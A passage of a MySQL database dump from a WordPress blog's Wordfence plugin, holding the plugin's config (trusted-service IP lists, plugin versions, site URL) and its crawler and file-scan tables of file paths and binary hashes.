"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),
('wordfenceI18n','1','yes'),
('wordpressPluginVersions','a:7:{s:27:\"disable-remove-google-fonts\";s:5:\"1.6.3\";s:14:\"duplicate-page\";s:5:\"4.5.4\";s:9:\"elementor\";s:6:\"3.23.4\";s:13:\"elementor-pro\";s:6:\"3.23.3\";s:17:\"syntaxhighlighter\";s:5:\"3.7.0\";s:9:\"wordfence\";s:6:\"7.11.7\";s:13:\"wordpress-seo\";s:4:\"23.2\";}','yes'),
('wordpressThemeVersions','a:2:{s:15:\"hello-elementor\";s:5:\"3.1.1\";s:16:\"twentytwentyfour\";s:3:\"1.2\";}','yes'),
('wordpressVersion','6.6.1','yes'),
('wp_home_url','https://ictbank.ir/blog','yes'),
('wp_site_url','https://ictbank.ir/blog','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfcrawlers`
--
DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfcrawlers` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`patternSig` binary(16) NOT NULL,
`status` char(8) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
`PTR` varchar(255) DEFAULT '',
PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfcrawlers`
--
LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES
('\0\0\0\0\0\0\0\0\0\0��\0\0\0\0','�����>�b0�oQ1��','verified',1723304754,'crawl-66-249-66-83.googlebot.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilechanges`
--
DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wffilechanges` (
`filenameHash` char(64) NOT NULL,
`file` varchar(1000) NOT NULL,
`md5` char(32) NOT NULL,
PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilechanges`
--
LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilemods`
--
DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wffilemods` (
`filenameMD5` binary(16) NOT NULL,
`filename` varchar(1000) NOT NULL,
`real_path` text NOT NULL,
`knownFile` tinyint(3) unsigned NOT NULL,
`oldMD5` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`newMD5` binary(16) NOT NULL,
`SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
`stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
`isSafeFile` varchar(1) NOT NULL DEFAULT '?',
PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilemods`
--
LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES
('\0r�*���!*2 E���','wp-content/plugins/elementor-pro/assets/js/packages/editor-notes/editor-notes.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/packages/editor-notes/editor-notes.js',0,'�xn�R�ު,3�C���}','�xn�R�ު,3�C���}','�2�w��\"�SA�&��8���wC�`ϲ\r','',0,'?'),
('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),
('\0��w�c��-+��z','wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-10.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-10.php',0,'����,���\\Rw#]x�','����,���\\Rw#]x�','c���´oʏ3̪�ͮJi���:\0f���','',0,'?'),
('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png','/var/www/html/ictbank/blog/wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),
('\00��#�9���Z4�j$','wp-admin/network/user-edit.php','/var/www/html/ictbank/blog/wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),
('\05g���c�0�\"D','wp-includes/css/media-views-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�����G��7+=_','��)�����@�S�a�=��WުT�oB���','',0,'?'),
('\0C_\n��jD��@k','wp-admin/network/index.php','/var/www/html/ictbank/blog/wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��/IGV7w����Y','�E���7]0�-i��Y�����6w~U�6��','',0,'?'),
('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),
('\0Z>�����f��','wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/shortcode.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/shortcode.php',0,'/d��+*>�d�����','/d��+*>�d�����','!q�3[Y��bG7��nm]�\Z�^���<','',0,'?'),
('\0\\s�TÐ��֘8��','wp-includes/blocks/post-excerpt/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-excerpt/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���a�N�4=��\r^','�~�ŪA��W��w�@7�vz����4�_','',0,'?'),
('\0_�]��wgGS�K��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ContainerInterface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~rD�5�y�E��:','��蛮����!Z|��L���x<A6�&��','',0,'?'),
('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php','/var/www/html/ictbank/blog/wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3� vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),
('\0f��Zk͗��!N�)0','wp-content/plugins/elementor-pro/core/data/controller.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/data/controller.php',0,'��w$LY�z�$v','��w$LY�z�$v','�ܱ|��s�B|^;B� VK1��\rbeF��N','',0,'?'),
('\0h��QJ��?�X�4�-','wp-content/plugins/elementor/assets/js/ai.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/ai.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�L���\'Q�k�i�{','3���Z6�\0i�\r\n�}�CNJ|6C�\Z����.v\Z','',0,'?'),
('\0��IJ+���}w����','wp-content/plugins/elementor-pro/modules/link-in-bio/classes/render/icons-below-cta-render.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/link-in-bio/classes/render/icons-below-cta-render.php',0,'c�K��5aU�ӟ��O=�','c�K��5aU�ӟ��O=�','[�\n$���h���}����1�Er���͆^��','',0,'?'),
('\0��2��� �Ky�v�','wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��ƉM7+D','�Yj���x���J��oq��!��bNgk�Y@�','',0,'?'),
('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js','/var/www/html/ictbank/blog/wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K2���~Q�L��el�|','��=Ԅ�DρO´�ZMP�~�>/l���5��','',0,'?'),
('\0�����ڇ1ƹL���','wp-content/plugins/syntaxhighlighter/syntaxhighlighter.php','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h2�u:7�O�?�{\Z','��:����^ZU����yl`���#2d�h��','',0,'?'),
('\0�!ߺN�b���LY��b','wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushBash.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushBash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y~�KB��BDϹǀe','<Y�� \"C�p]В����\0kA�,m����[','',0,'?'),
('\0��\'�6&H�v�]��','wp-includes/block-bindings/post-meta.php','/var/www/html/ictbank/blog/wp-includes/block-bindings/post-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=n�=FU�*���J','���M���c�C#��Dʏr�2��e','',0,'?'),
('\0��%ΥJ-�p��','wp-content/plugins/wordpress-seo/inc/class-rewrite.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\']G�́����u��','��6��in�voҁ�\Z��:�Kb8I��A','',0,'?'),
('\0��6��e@V��pI�D','wp-content/plugins/elementor/modules/system-info/helpers/model-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/system-info/helpers/model-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d;G�g����`','t%T�KC���y�%ejN��t��Ok���ԒF�','',0,'?'),
('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��43k�&t�8�p��','�j��+��JL¦�{����\Z��I]�ً�=�','',0,'?'),
('\0�X��L�&����\Z�f','wp-includes/blocks/page-list-item/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/page-list-item/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�--ªZ(�Ρ��RC','��?��5��࠰)\'�\\�DMh_�����','',0,'?'),
('\0�K�P���?\\ayi�','wp-content/themes/hello-elementor/style.min.css','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��糸!���Ȗ�5�q8','S���eW�řX�8�Z���f%��35~|�`��','',0,'?'),
('\0���F��~?� �','wp-content/plugins/elementor/assets/shapes/mountains.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/shapes/mountains.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Pq%�@��u��\"O��','�����}Îׯ��<pݭ���#�X','',0,'?'),
('\0�|9��u�e���@��','wp-admin/includes/image.php','/var/www/html/ictbank/blog/wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�)`iU����','�}g%��D�*�k�u�u��(2r�K�&m��vL','',0,'?'),
('\0˖�C�y�(���Q�','wp-content/plugins/elementor/modules/link-in-bio/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/link-in-bio/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','30���K���Zq�K�[N','�&I��v&w�g1\",[�,�:uăM\Z�t�D�G�','',0,'?'),
('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������<6�<','���,�=����Cc�jx�ffS���L�����\';','',0,'?'),
('\0�K�%�5,�$ˣ','wp-includes/blocks/video/theme.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/video/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' X6�TcW#�\'�L��','D f��7��R�.�+��;�`1�-p:}yu6','',0,'?'),
('\0�lDd��u^��Y��','wp-admin/user/privacy.php','/var/www/html/ictbank/blog/wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),
('\0�v����ئ���ݞ','wp-includes/blocks/post-template/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-template/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.f浰�t�A�N|','�,Do���{�ĝ�3o��Α �Q;�w���a','',0,'?'),
('\0�,�ʨ�7|0��Ev-','wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/user-profile-picture.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/user-profile-picture.php',0,'�;��K��vV�~�w','�;��K��vV�~�w','�?Ď�2��y��ӕ\ZJ�O��M��:D��j��','',0,'?'),
('\0��$�X��G-�tUƹ','wp-includes/blocks/navigation-link/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/navigation-link/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ZD{\nő��5��9','ik�`x��𤡀E�u由�6����,�Q3��','',0,'?'),
('\0� $���ә\0֫','wp-includes/block-patterns.php','/var/www/html/ictbank/blog/wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']\Z\"*���J�\Z','�E4@�f�[��\0�*�\';�:_�`�![A��)�M','',0,'?'),
('\0�����/��9�Y=�y','wp-content/plugins/elementor/modules/favorites/controller.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/favorites/controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�Vz�%����Q(���','_�7����7m72���=�811h��b��u','',0,'?'),
('\0�76����ڙ���h','wp-content/plugins/elementor/core/common/modules/connect/apps/library.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/common/modules/connect/apps/library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KNzβ���C�8�j�*','`כ��2��� G~3����@p!�hd�:�','',0,'?'),
('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�$�qs��O2���','R�F%�njXi<<���$ڋ��vMCo��� 3','',0,'?'),
('��&�Փ[�4��y*','wp-content/plugins/elementor-pro/modules/posts/widgets/posts-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/posts/widgets/posts-base.php',0,'9S��CN�+,p��','9S��CN�+,p��','�=\"cg�Uf)��5��� �~�.���dR��','',0,'?'),
('\rq�w�Aț','wp-content/plugins/elementor/includes/elements/repeater.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/elements/repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�֪a���f6��?���','�\Zb�:�/��e�к*��r�k�Վh>y潌U','',0,'?'),
('��sT�[Ի#g�@�','wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/icon-sets/icomoon.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/icon-sets/icomoon.php',0,'@�~�su#e�,]','@�~�su#e�,]','���x /\',�M��#��\\��(ĉ��P\"a�H{�','',0,'?'),
('\Zף�(&D�%�0h�','wp-includes/Requests/src/Utility/CaseInsensitiveDictionary.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W!���p�m5RHE�)�','�Ҟ�\0�[��U =��b��\Z�^��ճ��','',0,'?'),
('/>����(��3�','wp-includes/blocks/verse/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/verse/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�ˣR�R|�����','�j/+�H���+��z*c��*��a�a�e�','',0,'?'),
('5��0ăg=aa��','wp-content/plugins/elementor-pro/modules/forms/submissions/data/endpoints/forms-index.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/submissions/data/endpoints/forms-index.php',0,'�f\\�2�:=]U��>�','�f\\�2�:=]U��>�','V�r/�(���i&J�A��((/b��5�*j�A ','',0,'?'),
('<R��o~�@�%�5�','wp-content/plugins/elementor-pro/assets/css/widget-popup-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-popup-rtl.min.css',0,';q�P9ָsh��_�',';q�P9ָsh��_�','+!_��{#�>�~)�o�6�jբD���:_','',0,'?'),
('C��(�LC*R��\0','wp-content/plugins/wordfence/lib/wfCurlInterceptor.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfCurlInterceptor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FHim��{X{bȤ��L','\\�O��q��L{��3��<���K�9��\n��=','',0,'?'),
('Fm&g�\r�[�X���_','wp-content/plugins/elementor/core/dynamic-tags/base-tag.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/dynamic-tags/base-tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�%74�OƎ`?��','��B\\�c3�0gˎҟ0BI%�D�C��p~��','',0,'?'),
('H��L�<�Կ��9','wp-content/plugins/elementor/core/base/background-process/wp-async-request.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/base/background-process/wp-async-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�əH�j\n�˱P��','���G�2O�z����2��d\r���U��[$','',0,'?'),
('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif','/var/www/html/ictbank/blog/wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ayO�1/2|� �{&]�','L�p�-�8��7�Q|J���i`1�O�2��c��','',0,'?'),
('T�\r�4�}�^a@|O','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b9<��ҕ�IrBzL�*','Ͻ��\"����_��Ħ��X%O��4�Ӆ:Y','',0,'?'),
('V����H�R6%?�\r�','wp-content/plugins/elementor-pro/modules/forms/actions/activity-log.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/actions/activity-log.php',0,'�S�7��d���\0��2','�S�7��d���\0��2','���&(��3=jFXz!�Nq�0��! (�!7M','',0,'?'),
('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\h����\'\n䷺',' �7��RG�$/����-i��Nm(�W�;̅','',0,'?'),
('u�M�z�l60��{C�','wp-content/plugins/duplicate-page/duplicatepage.php','/var/www/html/ictbank/blog/wp-content/plugins/duplicate-page/duplicatepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{������3�$�','��-��=��o*���P�r2u|��� � 6f�','',0,'?'),
('z��,�M�e�\'qJ!Z','wp-content/plugins/elementor-pro/modules/woocommerce/tags/product-price.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/tags/product-price.php',0,'\"\0A!�5�\'���8��','\"\0A!�5�\'���8��','_(�ʏ3Ƙ���-B�\">0 $P����e��S','',0,'?'),
('�q���]��C(S��~','wp-content/plugins/elementor/core/debug/classes/inspection-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/debug/classes/inspection-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����������L��','ҳ�r&�%�i�j$g�\r���.��%L�����>��','',0,'?'),
('�T�h���zP��r�','wp-admin/widgets.php','/var/www/html/ictbank/blog/wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���*N��p=���2�','|��\n�2��U�)j+���oL� �)���o�','',0,'?'),
('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T@UJ1 +4iK��.�','��Y?�g���q���b6�c\"~lCQ','',0,'?'),
('�u�9���5�EzV9','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/GuzzleException.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/GuzzleException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RD��H\\0�rs��','�\0�f]�WE�-]v��#S���WKV�','',0,'?'),
('�\0�B��\"�O�;AI�E','wp-content/plugins/elementor-pro/assets/js/page-transitions.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/page-transitions.js',0,'�\nO��i]@�P�-x/','�\nO��i]@�P�-x/','[�-��Oon3J ى!��l���!}8�','',0,'?'),
('�
M�K�5�#�g���','wp-content/plugins/elementor-pro/assets/css/app-rtl.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/app-rtl.css',0,'�����|�ܸks�','�����|�ܸks�','�u�d�v�P��U���:\"�B�0�|j��','',0,'?'),
('ā�:?�&]���(�','wp-content/plugins/elementor-pro/assets/js/product-add-to-cart.e099bc90899376d00959.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/product-add-to-cart.e099bc90899376d00959.bundle.js',0,'�D���u�Q��\"� �9','�D���u�Q��\"� �9','k��<��.�!S�8m>+�\n�Cf���?Y','',0,'?'),
('�X|_��wc�:�j��','wp-includes/blocks/search/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{.�7�@:A���W�=','�\n�$�� !x�>nM�tX_���ڥ\"�m','',0,'?'),
('�~�K��]�^','wp-content/plugins/elementor/assets/css/widget-image-gallery-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-image-gallery-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\nw�N�S�bb�S{','�E[�)S\'N��SFf��Tc�����J�^','',0,'?'),
('��Uj���P���','wp-content/plugins/elementor-pro/assets/css/preview.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/preview.css',0,'���\r:k\"�]�e�^8_','���\r:k\"�]�e�^8_','��7��A��v�u\"�j�r�ӎ�ǟ0�u��R','',0,'?'),
('�{�1�*hM3�����','wp-content/plugins/wordpress-seo/js/dist/externals/uiLibrary.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/externals/uiLibrary.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G����\n���','[��?�-�\\81t��Hza�%R��C��H��\'#','',0,'?'),
('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),
